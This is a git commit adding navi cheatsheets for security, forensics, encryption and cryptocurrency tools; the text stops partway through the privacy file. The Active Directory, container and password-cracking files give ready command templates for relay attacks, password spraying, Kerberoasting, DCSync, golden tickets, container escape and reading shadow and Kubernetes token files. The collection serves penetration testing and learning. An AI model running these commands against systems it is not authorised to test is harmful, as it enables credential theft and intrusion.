Initial cypherpunk-cheats collection: 22 navi cheatsheets

2026-01-04 15:05:38 -07:00 · 2026-01-04 15:05:38 -07:00 · 0fc9b49c22
commit 0fc9b49c22
25 changed files with 2296 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,14 @@
 # OS
 .DS_Store
 Thumbs.db
 # Editors
 *.swp
 *.swo
 *~
 .vscode/
 .idea/
 # Temp files
 *.tmp
 *.bak
--- a/21
+++ b/21
@ -0,0 +1,21 @@
 MIT License
 Copyright (c) 2025 rpriven
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
 The above copyright notice and this permission notice shall be included in all
 copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
--- a/README.md
+++ b/README.md
@ -0,0 +1,104 @@
 # Cypherpunk Cheats
 Navi-compatible cheatsheets for security, privacy, and digital sovereignty.
 ## Installation
 ```bash
 # Install navi
 cargo install navi
 # Or via package manager
 sudo apt install navi  # Debian/Ubuntu
 brew install navi      # macOS
 # Add this repo to navi (choose one)
 navi repo add https://github.com/rpriven/cypherpunk-cheats        # GitHub
 navi repo add https://git.djeditech.com/djedi/cypherpunk-cheats   # Mirror
 ```
 ## Manual Setup
 Add to your navi config (`~/.config/navi/config.yaml`):
 ```yaml
 cheats:
  paths:
    - /path/to/cypherpunk-cheats
 ```
 ## Usage
 ```bash
 # Launch navi
 navi
 # Query specific topic
 navi --query "nmap"
 navi --query "monero"
 navi --query "luks"
 # Preview mode
 navi --preview
 # Use with custom path
 navi --path /path/to/cypherpunk-cheats
 ```
 ## Categories
 ### Offensive Security
 | File | Description |
 |------|-------------|
 | `nmap.cheat` | Port scanning and service enumeration |
 | `web.cheat` | Web application testing (ffuf, sqlmap, nikto) |
 | `hashcat.cheat` | Password cracking with Hashcat |
 | `john.cheat` | John the Ripper password cracking |
 | `privesc-linux.cheat` | Linux privilege escalation |
 | `privesc-windows.cheat` | Windows privilege escalation |
 | `active-directory.cheat` | AD attacks (NetExec, Kerberoasting) |
 | `containers.cheat` | Docker/Kubernetes security |
 | `wireless.cheat` | WiFi attacks (aircrack-ng, WPA cracking) |
 | `tunnels.cheat` | SSH tunnels, chisel, pivoting |
 ### DFIR & Analysis
 | File | Description |
 |------|-------------|
 | `forensics.cheat` | Volatility, disk imaging, evidence collection |
 | `osint.cheat` | Sherlock, theHarvester, recon-ng |
 | `wireshark.cheat` | Packet analysis (tshark, tcpdump) |
 | `reversing.cheat` | Ghidra, radare2, GDB, binary analysis |
 | `steganography.cheat` | Hidden data extraction (steghide, binwalk) |
 ### Privacy & Encryption
 | File | Description |
 |------|-------------|
 | `privacy.cheat` | Tor, GPG, age encryption, metadata removal |
 | `luks.cheat` | Full disk encryption (LUKS, dm-crypt) |
 | `pass.cheat` | Password managers (pass, KeePassXC) |
 | `secure-comms.cheat` | Signal CLI, Matrix, encrypted messaging |
 ### Cryptocurrency & Web3
 | File | Description |
 |------|-------------|
 | `monero.cheat` | Monero CLI wallet operations |
 | `bitcoin.cheat` | Bitcoin Core CLI operations |
 | `solidity.cheat` | Smart contract auditing (Slither, Foundry) |
 ## Philosophy
 Built for cypherpunks who value:
 - **Privacy** - Default to encrypted, anonymous, and sovereign
 - **Security** - Offensive knowledge for defensive thinking
 - **Freedom** - Tools for digital self-determination
 ## Contributing
 PRs welcome! Follow the navi `.cheat` format:
 - `%` tags for categories
 - `#` comments for descriptions
 - `$` for argument completion
 ## License
 MIT
--- a/active-directory.cheat
+++ b/active-directory.cheat
@ -0,0 +1,75 @@
 % ad, active-directory, kerberos, windows, netexec
 # Start Responder (LLMNR/NBT-NS poisoning)
 sudo responder -I <interface> -dwPv
 # SMB relay attack
 sudo ntlmrelayx.py -tf targets.txt -smb2support
 # Get domain users (NetExec - replacement for crackmapexec)
 nxc smb <dc_ip> -u <username> -p <password> --users
 # Get domain groups
 nxc smb <dc_ip> -u <username> -p <password> --groups
 # Password spray
 nxc smb <dc_ip> -u users.txt -p '<password>' --continue-on-success
 # Password spray multiple passwords
 nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
 # Kerberoasting - Get TGS tickets
 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request
 # AS-REP Roasting
 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat
 # Dump secrets (admin required)
 secretsdump.py <domain>/<username>:<password>@<target>
 # Pass the hash
 psexec.py <domain>/<username>@<target> -hashes <lmhash>:<nthash>
 # Pass the hash with NetExec
 nxc smb <target> -u <username> -H <nthash>
 # DCSync attack
 secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc
 # Get shell with psexec
 psexec.py <domain>/<username>:<password>@<target>
 # Get shell with wmiexec
 wmiexec.py <domain>/<username>:<password>@<target>
 # Get shell with evil-winrm
 evil-winrm -i <target> -u <username> -p <password>
 # BloodHound collection
 bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>
 # PowerView - Get domain info
 Import-Module .\PowerView.ps1; Get-Domain
 # PowerView - Get domain users
 Get-DomainUser | select samaccountname
 # PowerView - Get domain computers
 Get-DomainComputer | select name
 # PowerView - Find domain admins
 Get-DomainGroupMember "Domain Admins"
 # Golden ticket with mimikatz
 mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"
 # Silver ticket
 mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /target:<target> /service:<service> /rc4:<service_hash> /ptt" "exit"
 $ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
 $ dc_ip: echo ""
 $ domain: echo ""
 $ username: echo ""
 $ password: echo ""
 $ target: echo ""
 $ nthash: echo ""
--- a/bitcoin.cheat
+++ b/bitcoin.cheat
@ -0,0 +1,132 @@
 % bitcoin, btc, cryptocurrency, wallet
 # Start Bitcoin daemon
 bitcoind
 # Start daemon with options
 bitcoind -daemon -server
 # Stop daemon
 bitcoin-cli stop
 # Get blockchain info
 bitcoin-cli getblockchaininfo
 # Get network info
 bitcoin-cli getnetworkinfo
 # Get wallet info
 bitcoin-cli getwalletinfo
 # Create new wallet
 bitcoin-cli createwallet "<wallet_name>"
 # Load wallet
 bitcoin-cli loadwallet "<wallet_name>"
 # List wallets
 bitcoin-cli listwallets
 # Generate new address
 bitcoin-cli getnewaddress
 # Generate new address with label
 bitcoin-cli getnewaddress "<label>"
 # Get balance
 bitcoin-cli getbalance
 # List unspent outputs
 bitcoin-cli listunspent
 # List transactions
 bitcoin-cli listtransactions
 # Get transaction details
 bitcoin-cli gettransaction "<txid>"
 # Send to address
 bitcoin-cli sendtoaddress "<address>" <amount>
 # Send with fee rate
 bitcoin-cli sendtoaddress "<address>" <amount> "" "" false true null "unset" null <fee_rate>
 # Create raw transaction
 bitcoin-cli createrawtransaction '[{"txid":"<txid>","vout":<vout>}]' '{"<address>":<amount>}'
 # Sign raw transaction
 bitcoin-cli signrawtransactionwithwallet "<hex>"
 # Send raw transaction
 bitcoin-cli sendrawtransaction "<hex>"
 # Estimate fee (blocks to confirm)
 bitcoin-cli estimatesmartfee <blocks>
 # Dump private key (WIF)
 bitcoin-cli dumpprivkey "<address>"
 # Import private key
 bitcoin-cli importprivkey "<wif_key>"
 # Backup wallet
 bitcoin-cli backupwallet "<backup_path>"
 # Encrypt wallet
 bitcoin-cli encryptwallet "<passphrase>"
 # Unlock wallet (seconds)
 bitcoin-cli walletpassphrase "<passphrase>" <timeout>
 # Lock wallet
 bitcoin-cli walletlock
 # Get block hash
 bitcoin-cli getblockhash <height>
 # Get block data
 bitcoin-cli getblock "<blockhash>"
 # Decode raw transaction
 bitcoin-cli decoderawtransaction "<hex>"
 # Verify message signature
 bitcoin-cli verifymessage "<address>" "<signature>" "<message>"
 # Sign message
 bitcoin-cli signmessage "<address>" "<message>"
 # Sparrow Wallet (GUI - recommended)
 sparrow
 # Electrum (lightweight wallet)
 electrum
 # Hardware wallet - Trezor
 trezorctl list
 trezorctl get-address -n "m/84'/0'/0'/0/0"
 # Hardware wallet - Ledger
 # Use Ledger Live or HWI
 # Bitcoin Core config (~/.bitcoin/bitcoin.conf)
 # server=1
 # rpcuser=user
 # rpcpassword=pass
 # txindex=1
 $ wallet_name: bitcoin-cli listwallets 2>/dev/null | jq -r '.[]' 2>/dev/null
 $ label: echo "main"
 $ txid: echo ""
 $ address: echo ""
 $ amount: echo "0.001"
 $ fee_rate: echo "10"
 $ vout: echo "0"
 $ hex: echo ""
 $ wif_key: echo ""
 $ backup_path: echo "wallet_backup.dat"
 $ passphrase: echo ""
 $ timeout: echo "60"
 $ height: echo "0"
 $ blockhash: echo ""
 $ blocks: echo "6"
--- a/containers.cheat
+++ b/containers.cheat
@ -0,0 +1,67 @@
 % docker, kubernetes, containers, escape
 # Check if inside container
 ls -la /.dockerenv
 cat /proc/1/cgroup | grep docker
 # List docker images
 docker images
 # List running containers
 docker ps
 # List all containers
 docker ps -a
 # Execute into container
 docker exec -it <container_id> /bin/bash
 # Inspect container
 docker inspect <container_id>
 # Docker socket escape (if socket mounted)
 docker run -v /:/hostfs -it alpine chroot /hostfs
 # Privileged container escape - mount host
 mkdir /mnt/host && mount /dev/sda1 /mnt/host
 # Check capabilities
 capsh --print
 # Kubernetes - get pods
 kubectl get pods
 # Kubernetes - get all namespaces
 kubectl get namespaces
 # Kubernetes - get pods all namespaces
 kubectl get pods --all-namespaces
 # Kubernetes - get secrets
 kubectl get secrets
 # Kubernetes - decode secret
 kubectl get secret <secret_name> -o yaml
 # Kubernetes - exec into pod
 kubectl exec -it <pod_name> -- /bin/bash
 # Get service account token
 cat /var/run/secrets/kubernetes.io/serviceaccount/token
 # Check RBAC permissions
 kubectl auth can-i --list
 # Trivy - scan image
 trivy image <image_name>
 # Deepce - Docker enumeration
 ./deepce.sh
 # CDK - container pentest toolkit
 ./cdk evaluate
 $ container_id: docker ps --format "{{.ID}}\t{{.Names}}" 2>/dev/null
 $ pod_name: kubectl get pods --no-headers 2>/dev/null | awk '{print $1}'
 $ secret_name: kubectl get secrets --no-headers 2>/dev/null | awk '{print $1}'
 $ image_name: docker images --format "{{.Repository}}:{{.Tag}}" 2>/dev/null
--- a/forensics.cheat
+++ b/forensics.cheat
@ -0,0 +1,97 @@
 % forensics, dfir, volatility, memory, incident-response
 # Volatility 3 - identify OS
 vol -f <memory_dump> windows.info
 # Volatility 3 - process list
 vol -f <memory_dump> windows.pslist
 # Volatility 3 - process tree
 vol -f <memory_dump> windows.pstree
 # Volatility 3 - hidden processes
 vol -f <memory_dump> windows.psscan
 # Volatility 3 - network connections
 vol -f <memory_dump> windows.netscan
 # Volatility 3 - command line history
 vol -f <memory_dump> windows.cmdline
 # Volatility 3 - DLLs for process
 vol -f <memory_dump> windows.dlllist --pid <pid>
 # Volatility 3 - malware detection
 vol -f <memory_dump> windows.malfind
 # Volatility 3 - registry hives
 vol -f <memory_dump> windows.registry.hivelist
 # Volatility 3 - dump process memory
 vol -f <memory_dump> windows.memmap --pid <pid> --dump
 # Volatility 2 - image info (legacy)
 volatility -f <memory_dump> imageinfo
 # Volatility 2 - with profile
 volatility -f <memory_dump> --profile=<profile> pslist
 # Disk imaging with dd
 sudo dd if=<source_device> of=<output_file> bs=64K conv=noerror,sync status=progress
 # Disk imaging with dcfldd (forensic)
 sudo dcfldd if=<source_device> of=<output_file> hash=md5,sha256 hashlog=hashes.txt
 # Mount forensic image read-only
 sudo mount -o ro,loop,noexec <image_file> <mount_point>
 # Mount with offset (partition)
 sudo mount -o ro,loop,offset=$((512*<sector_offset>)) <image_file> <mount_point>
 # File carving with foremost
 foremost -i <image_file> -o <output_dir>
 # File recovery with photorec
 photorec <image_file>
 # File recovery with scalpel
 scalpel -c /etc/scalpel/scalpel.conf -o <output_dir> <image_file>
 # Timeline with plaso
 log2timeline.py <output.plaso> <evidence_source>
 # Parse plaso timeline
 psort.py -o l2tcsv <output.plaso> -w timeline.csv
 # Extract strings from binary
 strings -n 8 <file>
 strings -e l <file>
 # Calculate file hashes
 md5sum <file> && sha256sum <file>
 # Chainsaw - Windows event log hunting
 chainsaw hunt <evtx_dir> --rules <sigma_rules_dir>
 # Parse Windows prefetch
 PECmd.exe -d C:\Windows\Prefetch --csv <output_dir>
 # Registry analysis with RegRipper
 rip.pl -r <registry_hive> -p all
 # KAPE collection
 kape.exe --tsource C: --tdest <output_dir> --target !SANS_Triage
 # Autopsy (GUI forensics)
 autopsy
 $ memory_dump: find . -name "*.raw" -o -name "*.mem" -o -name "*.dmp" 2>/dev/null
 $ source_device: lsblk -dpno NAME | head -5
 $ output_file: echo "disk.raw"
 $ image_file: find . -name "*.raw" -o -name "*.dd" -o -name "*.img" 2>/dev/null
 $ mount_point: echo "/mnt/evidence"
 $ output_dir: echo "output"
 $ pid: echo ""
 $ profile: echo "Win10x64_19041"
 $ sector_offset: echo "2048"
 $ evtx_dir: echo "/path/to/evtx"
--- a/hashcat.cheat
+++ b/hashcat.cheat
@ -0,0 +1,50 @@
 % hashcat, cracking, passwords
 # Crack MD5 hash
 hashcat -m 0 <hashfile> <wordlist> -O
 # Crack NTLM hash
 hashcat -m 1000 <hashfile> <wordlist> -O
 # Crack NTLMv2 (Responder capture)
 hashcat -m 5600 <hashfile> <wordlist> -O
 # Crack SHA-512 Linux ($6$)
 hashcat -m 1800 <hashfile> <wordlist> -O
 # Crack Kerberoasting TGS
 hashcat -m 13100 <hashfile> <wordlist> -O
 # Crack AS-REP Roast
 hashcat -m 18200 <hashfile> <wordlist> -O
 # Crack WPA2
 hashcat -m 22000 <hashfile> <wordlist> -O
 # Crack bcrypt
 hashcat -m 3200 <hashfile> <wordlist> -O
 # Crack JWT
 hashcat -m 16500 <hashfile> <wordlist> -O
 # With rules (best64)
 hashcat -m <mode> <hashfile> <wordlist> -r /usr/share/hashcat/rules/best64.rule -O
 # Mask attack - 4 digits
 hashcat -m <mode> <hashfile> -a 3 ?d?d?d?d
 # Mask attack - 8 lowercase
 hashcat -m <mode> <hashfile> -a 3 ?l?l?l?l?l?l?l?l
 # Mask attack - Password1! pattern
 hashcat -m <mode> <hashfile> -a 3 ?u?l?l?l?l?l?l?l?d?s
 # Show cracked passwords
 hashcat -m <mode> <hashfile> --show
 # Resume session
 hashcat --restore
 $ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
 $ wordlist: echo "/usr/share/wordlists/rockyou.txt"
 $ mode: echo "0\n100\n1000\n1400\n1700\n1800\n3200\n5600\n13100\n18200" --- --header "Mode: 0=MD5, 100=SHA1, 1000=NTLM, 1400=SHA256, 1700=SHA512, 1800=sha512crypt, 3200=bcrypt, 5600=NTLMv2, 13100=Kerberoast, 18200=AS-REP"
--- a/john.cheat
+++ b/john.cheat
@ -0,0 +1,58 @@
 % john, cracking, passwords
 # Auto-detect and crack
 john <hashfile>
 # Crack with wordlist
 john --wordlist=<wordlist> <hashfile>
 # Crack NTLM
 john --format=nt --wordlist=<wordlist> <hashfile>
 # Crack MD5
 john --format=raw-md5 --wordlist=<wordlist> <hashfile>
 # Crack SHA-512 Linux
 john --format=sha512crypt --wordlist=<wordlist> <hashfile>
 # Crack bcrypt
 john --format=bcrypt --wordlist=<wordlist> <hashfile>
 # Show cracked passwords
 john --show <hashfile>
 # With rules
 john --wordlist=<wordlist> --rules <hashfile>
 # SSH key crack
 ssh2john <ssh_key> > ssh_hash.txt && john --wordlist=<wordlist> ssh_hash.txt
 # ZIP file crack
 zip2john <zip_file> > zip_hash.txt && john --wordlist=<wordlist> zip_hash.txt
 # RAR file crack
 rar2john <rar_file> > rar_hash.txt && john --wordlist=<wordlist> rar_hash.txt
 # PDF crack
 pdf2john <pdf_file> > pdf_hash.txt && john --wordlist=<wordlist> pdf_hash.txt
 # Office document crack
 office2john <office_file> > office_hash.txt && john --wordlist=<wordlist> office_hash.txt
 # KeePass crack
 keepass2john <kdbx_file> > keepass_hash.txt && john --wordlist=<wordlist> keepass_hash.txt
 # Linux shadow file
 unshadow /etc/passwd /etc/shadow > unshadowed.txt && john --wordlist=<wordlist> unshadowed.txt
 # List available formats
 john --list=formats
 $ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
 $ wordlist: echo "/usr/share/wordlists/rockyou.txt"
 $ ssh_key: find . -name "id_rsa" -o -name "*.pem" 2>/dev/null
 $ zip_file: find . -name "*.zip" 2>/dev/null
 $ rar_file: find . -name "*.rar" 2>/dev/null
 $ pdf_file: find . -name "*.pdf" 2>/dev/null
 $ office_file: find . -name "*.docx" -o -name "*.xlsx" 2>/dev/null
 $ kdbx_file: find . -name "*.kdbx" 2>/dev/null
--- a/luks.cheat
+++ b/luks.cheat
@ -0,0 +1,124 @@
 % luks, encryption, disk, dm-crypt, fde
 # Check if device is LUKS
 sudo cryptsetup isLuks <device>
 # LUKS info
 sudo cryptsetup luksDump <device>
 # Create LUKS volume
 sudo cryptsetup luksFormat <device>
 # Create LUKS2 volume (recommended)
 sudo cryptsetup luksFormat --type luks2 <device>
 # Create LUKS with specific cipher
 sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 <device>
 # Open LUKS volume
 sudo cryptsetup luksOpen <device> <mapper_name>
 # Open LUKS (alternative syntax)
 sudo cryptsetup open <device> <mapper_name>
 # Close LUKS volume
 sudo cryptsetup luksClose <mapper_name>
 # Add key to LUKS
 sudo cryptsetup luksAddKey <device>
 # Add key from file
 sudo cryptsetup luksAddKey <device> <keyfile>
 # Remove key
 sudo cryptsetup luksRemoveKey <device>
 # Kill key slot
 sudo cryptsetup luksKillSlot <device> <slot_number>
 # Change passphrase
 sudo cryptsetup luksChangeKey <device>
 # Create filesystem on opened LUKS
 sudo mkfs.ext4 /dev/mapper/<mapper_name>
 # Mount LUKS volume
 sudo mount /dev/mapper/<mapper_name> <mount_point>
 # Unmount LUKS volume
 sudo umount <mount_point>
 sudo cryptsetup luksClose <mapper_name>
 # Create encrypted file container
 dd if=/dev/zero of=<container_file> bs=1M count=<size_mb>
 sudo cryptsetup luksFormat <container_file>
 sudo cryptsetup luksOpen <container_file> <mapper_name>
 sudo mkfs.ext4 /dev/mapper/<mapper_name>
 # Backup LUKS header
 sudo cryptsetup luksHeaderBackup <device> --header-backup-file <backup_file>
 # Restore LUKS header
 sudo cryptsetup luksHeaderRestore <device> --header-backup-file <backup_file>
 # Erase LUKS header (DESTROYS DATA!)
 sudo cryptsetup luksErase <device>
 # Check LUKS status
 sudo cryptsetup status <mapper_name>
 # Benchmark encryption
 cryptsetup benchmark
 # Auto-mount with /etc/crypttab
 # <mapper_name> <device> none luks
 # Auto-mount with keyfile
 # <mapper_name> <device> <keyfile> luks
 # Full disk encryption install (Ubuntu)
 # Select "Encrypt the new Ubuntu installation" during install
 # Encrypt home directory (ecryptfs - legacy)
 sudo apt install ecryptfs-utils
 ecryptfs-migrate-home -u <username>
 # LUKS on LVM
 sudo pvcreate /dev/mapper/<mapper_name>
 sudo vgcreate <vg_name> /dev/mapper/<mapper_name>
 sudo lvcreate -l 100%FREE -n <lv_name> <vg_name>
 # Resize LUKS volume (grow)
 sudo cryptsetup resize <mapper_name>
 sudo resize2fs /dev/mapper/<mapper_name>
 # Create encrypted swap
 sudo cryptsetup luksFormat <swap_device>
 sudo cryptsetup luksOpen <swap_device> cryptswap
 sudo mkswap /dev/mapper/cryptswap
 sudo swapon /dev/mapper/cryptswap
 # VeraCrypt CLI - create volume
 veracrypt -t -c
 # VeraCrypt CLI - mount
 veracrypt <volume_file> <mount_point>
 # VeraCrypt CLI - dismount
 veracrypt -d
 # VeraCrypt CLI - list mounted
 veracrypt -l
 $ device: lsblk -dpno NAME | grep -v loop
 $ mapper_name: ls /dev/mapper 2>/dev/null | grep -v control
 $ mount_point: echo "/mnt/encrypted"
 $ keyfile: echo "/root/keyfile"
 $ backup_file: echo "luks_header.backup"
 $ container_file: echo "encrypted_container.img"
 $ size_mb: echo "1024"
 $ slot_number: echo "0\n1\n2\n3\n4\n5\n6\n7"
 $ username: whoami
 $ vg_name: echo "encrypted_vg"
 $ lv_name: echo "data"
 $ volume_file: find ~ -name "*.hc" -o -name "*.tc" 2>/dev/null | head -5
--- a/monero.cheat
+++ b/monero.cheat
@ -0,0 +1,121 @@
 % monero, xmr, cryptocurrency, wallet
 # Start Monero daemon
 monerod
 # Start daemon with remote node (no local blockchain)
 monerod --bootstrap-daemon-address auto
 # Start wallet CLI
 monero-wallet-cli
 # Create new wallet
 monero-wallet-cli --generate-new-wallet <wallet_name>
 # Open existing wallet
 monero-wallet-cli --wallet-file <wallet_file>
 # Connect to remote node
 monero-wallet-cli --daemon-address <node_address>
 # Restore wallet from seed
 monero-wallet-cli --restore-deterministic-wallet
 # Restore from keys
 monero-wallet-cli --generate-from-keys <wallet_name>
 # Check balance (in wallet)
 balance
 # Check unlocked balance
 balance unlocked
 # Get wallet address
 address
 # Get all addresses (subaddresses)
 address all
 # Create new subaddress
 address new <label>
 # Show seed (KEEP SECRET!)
 seed
 # Show private keys (KEEP SECRET!)
 spendkey
 viewkey
 # Transfer XMR
 transfer <address> <amount>
 # Transfer with priority
 transfer <priority> <address> <amount>
 # Sweep all to address
 sweep_all <address>
 # Show transaction history
 show_transfers
 # Show incoming transfers
 show_transfers in
 # Show outgoing transfers
 show_transfers out
 # Show pending transfers
 show_transfers pending
 # Check transaction status
 show_transfer <txid>
 # Export outputs (for hardware wallet)
 export_outputs outputs.txt
 # Import outputs
 import_outputs outputs.txt
 # Export key images
 export_key_images key_images.txt
 # Sign message with wallet
 sign <message>
 # Verify signed message
 verify <address> <signature> <message>
 # Rescan blockchain
 rescan_bc
 # Rescan spent outputs
 rescan_spent
 # Refresh wallet
 refresh
 # Set daemon address
 set_daemon <node_address>
 # Check daemon status
 status
 # Get fee estimate
 fee
 # Stop wallet
 exit
 # Public remote nodes (use with caution)
 # node.moneroworld.com:18089
 # nodes.hashvault.pro:18081
 # xmr-node.cakewallet.com:18081
 $ wallet_name: echo "my_wallet"
 $ wallet_file: find ~ -name "*.keys" 2>/dev/null | head -5
 $ node_address: echo "node.moneroworld.com:18089"
 $ address: echo ""
 $ amount: echo "0.1"
 $ priority: echo "0\n1\n2\n3\n4" --- --header "0=default, 1=unimportant, 2=normal, 3=elevated, 4=priority"
 $ txid: echo ""
 $ label: echo "donation"
--- a/nmap.cheat
+++ b/nmap.cheat
@ -0,0 +1,53 @@
 % nmap, scanning, recon
 # Quick SYN scan (top 1000 ports)
 nmap -sS <target>
 # Full port scan (all 65535)
 nmap -sS -p- <target>
 # Service version detection
 nmap -sV <target>
 # OS detection
 nmap -O <target>
 # Aggressive scan (OS, version, scripts, traceroute)
 nmap -A <target>
 # UDP scan (top ports)
 nmap -sU --top-ports 20 <target>
 # Script scan (default scripts)
 nmap -sC <target>
 # Vulnerability scan
 nmap --script vuln <target>
 # SMB enumeration
 nmap --script smb-enum-shares,smb-enum-users -p 445 <target>
 # HTTP enumeration
 nmap --script http-enum -p 80,443 <target>
 # Full comprehensive scan
 nmap -sS -sV -sC -O -p- -oA scan_<target> <target>
 # Scan multiple targets from file
 nmap -iL <targets_file>
 # Fast scan (top 100 ports)
 nmap -F <target>
 # Ping sweep (host discovery)
 nmap -sn <network_cidr>
 # Skip ping (scan even if host appears down)
 nmap -Pn <target>
 # Output all formats
 nmap -sS -sV -oA output_<target> <target>
 $ target: echo ""
 $ targets_file: find . -name "*.txt" -type f 2>/dev/null
 $ network_cidr: echo "192.168.1.0/24"
--- a/osint.cheat
+++ b/osint.cheat
@ -0,0 +1,106 @@
 % osint, recon, reconnaissance, intelligence
 # Sherlock - username search
 sherlock <username>
 # Sherlock - multiple usernames
 sherlock <username1> <username2> <username3>
 # Maigret - username search (better)
 maigret <username>
 # theHarvester - all sources
 theHarvester -d <domain> -b all
 # theHarvester - specific sources
 theHarvester -d <domain> -b google,linkedin,twitter
 # Subfinder - subdomain enumeration
 subfinder -d <domain>
 # Subfinder - with output
 subfinder -d <domain> -o subdomains.txt
 # Amass - subdomain enum
 amass enum -d <domain>
 # Amass - passive only
 amass enum -passive -d <domain>
 # Certificate transparency lookup
 curl -s "https://crt.sh/?q=%.<domain>&output=json" | jq -r '.[].name_value' | sort -u
 # DNS enumeration
 dig <domain> ANY
 dig <domain> MX
 dig <domain> TXT
 # Zone transfer attempt
 dig axfr @<nameserver> <domain>
 # Whois lookup
 whois <domain>
 # Reverse whois (by email)
 # Use viewdns.info or whoxy.com
 # Google dorking - site specific
 # site:<domain> filetype:pdf
 # Google dorking - login pages
 # site:<domain> inurl:login OR inurl:admin
 # Google dorking - exposed files
 # site:<domain> filetype:sql OR filetype:env OR filetype:log
 # Wayback machine URLs
 waybackurls <domain>
 # GitHub dorking - secrets
 # org:<company> password OR api_key OR secret
 # Shodan - host info
 shodan host <ip>
 # Shodan - search
 shodan search "hostname:<domain>"
 # Shodan - org search
 shodan search 'org:"<company_name>"'
 # Email verification
 curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=<api_key>"
 # SpiderFoot scan
 spiderfoot -s <target> -o output.html
 # Recon-ng
 recon-ng
 # Then: marketplace install all
 # workspaces create <name>
 # modules load recon/domains-hosts/hackertarget
 # Social media - Instagram OSINT
 # instaloader <username>
 # Image reverse search
 # Google Images, TinEye, Yandex
 # Metadata extraction
 exiftool <image>
 # GPS from image
 exiftool -gpslatitude -gpslongitude <image>
 # Check if email is breached
 # haveibeenpwned.com API or dehashed.com
 $ username: echo ""
 $ domain: echo ""
 $ ip: echo ""
 $ nameserver: echo ""
 $ company_name: echo ""
 $ email: echo ""
 $ api_key: echo ""
 $ target: echo ""
 $ image: find . -name "*.jpg" -o -name "*.png" 2>/dev/null | head -5
--- a/pass.cheat
+++ b/pass.cheat
@ -0,0 +1,134 @@
 % pass, password-manager, gpg, keepass
 # Initialize password store
 pass init <gpg_key_id>
 # Initialize with git
 pass git init
 # List all passwords
 pass
 # List passwords in folder
 pass <folder>
 # Show password
 pass <entry>
 # Show password (clipboard, 45 sec)
 pass -c <entry>
 # Generate new password
 pass generate <entry> <length>
 # Generate without symbols
 pass generate -n <entry> <length>
 # Generate and copy to clipboard
 pass generate -c <entry> <length>
 # Insert password manually
 pass insert <entry>
 # Insert multiline
 pass insert -m <entry>
 # Edit password
 pass edit <entry>
 # Remove password
 pass rm <entry>
 # Move/rename password
 pass mv <old_entry> <new_entry>
 # Copy password entry
 pass cp <entry> <new_entry>
 # Find password
 pass find <search_term>
 # Search in passwords
 pass grep <search_term>
 # Git push changes
 pass git push
 # Git pull changes
 pass git pull
 # Git status
 pass git status
 # Import from KeePass
 pass import keepass <kdbx_file>
 # Export to KeePass (manual or script)
 # pass show <entry> and import to KeePass
 # KeePassXC CLI - open database
 keepassxc-cli open <database>
 # KeePassXC CLI - list entries
 keepassxc-cli ls <database>
 # KeePassXC CLI - show entry
 keepassxc-cli show <database> <entry>
 # KeePassXC CLI - show password only
 keepassxc-cli show -s <database> <entry>
 # KeePassXC CLI - add entry
 keepassxc-cli add <database> <entry>
 # KeePassXC CLI - generate password
 keepassxc-cli generate -L <length>
 # KeePassXC CLI - clip password
 keepassxc-cli clip <database> <entry>
 # Bitwarden CLI - login
 bw login
 # Bitwarden CLI - unlock
 bw unlock
 # Bitwarden CLI - list items
 bw list items
 # Bitwarden CLI - get password
 bw get password <item_id>
 # Bitwarden CLI - create item
 bw create item <json_data>
 # Bitwarden CLI - sync
 bw sync
 # gopass (pass compatible with teams)
 gopass
 # gopass - init with multiple keys
 gopass init <key1> <key2>
 # gopass - recipient add
 gopass recipients add <gpg_key_id>
 # Rofi integration (pass menu)
 rofi-pass
 # Dmenu integration
 passmenu
 # Browser integration
 # browserpass extension + browserpass-native
 $ gpg_key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
 $ entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
 $ folder: pass 2>/dev/null | grep -v "Password Store" | grep "/" | head -5 | sed 's/[├│└──]//g' | tr -d ' '
 $ length: echo "20\n32\n64"
 $ old_entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
 $ new_entry: echo ""
 $ search_term: echo ""
 $ kdbx_file: find ~ -name "*.kdbx" 2>/dev/null | head -5
 $ database: find ~ -name "*.kdbx" 2>/dev/null | head -5
--- a/privacy.cheat
+++ b/privacy.cheat
@ -0,0 +1,128 @@
 % privacy, encryption, tor, gpg, pets
 # Generate GPG key pair
 gpg --full-generate-key
 # List GPG keys
 gpg --list-keys
 # List secret keys
 gpg --list-secret-keys
 # Export public key
 gpg --armor --export <key_id> > public.asc
 # Export private key (backup)
 gpg --armor --export-secret-keys <key_id> > private.asc
 # Import a key
 gpg --import <keyfile>
